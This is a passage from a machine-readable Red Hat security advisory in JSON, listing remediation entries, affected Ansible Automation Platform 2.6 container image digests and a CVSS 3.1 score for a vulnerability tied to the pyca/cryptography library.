"url": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c"
},
{
"category": "external",
"summary": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2",
"url": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2"
}
],
"release_date": "2026-02-10T21:42:56.471000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-01T18:20:27+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6404"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
